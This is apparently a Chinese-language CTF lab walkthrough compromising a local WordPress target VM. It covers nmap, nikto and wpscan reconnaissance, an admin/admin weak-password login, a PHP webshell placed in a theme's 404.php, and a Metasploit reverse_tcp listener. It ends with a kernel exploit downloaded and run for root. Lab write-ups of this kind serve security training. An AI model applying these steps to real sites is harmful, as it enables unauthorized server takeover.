作者:AK47GXF | 来源:互联网 | 2023-08-23 17:10
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
web安全介绍
环境配置
信息探测
深入挖掘
nikto扫描到robots.txt并进行访问
robots.txt文件出现/wordpress/,对其进行访问
返现用户登录界面,进行账号的枚举
尝试弱口令登录
生成webshell
上传shell
启动监听
执行shell
查看系统信息
提权
searchsploit ubuntu 4.4.0
编译代码
上传shellroot到/var/www/html下
下载shellroot到靶机
给shellroot提权并执行
web安全介绍
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。
环境配置
kali 192.168.20.128
靶机 192.168.20.142
链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw
提取码:6cpf
信息探测
nmap -sV 192.168.20.142
nmap -A -v -T4 192.168.20.142
nikto -host http://192.168.20.142
dirb http://192.168.20.142
深入挖掘
nikto扫描到robots.txt并进行访问
robots.txt文件出现/wordpress/,对其进行访问
返现用户登录界面,进行账号的枚举
wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u
尝试弱口令登录
admin/admin
生成webshell
上传shell
复制生成的shell上传到404页面上
启动监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.20.128
set lport 4444
run
执行shell
http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php
查看系统信息
提权
sudo -l提权不行
searchsploit ubuntu 4.4.0
编译代码
上传shellroot到/var/www/html下
下载shellroot到靶机
给shellroot提权并执行
chomod 777 shellroot
执行shellroot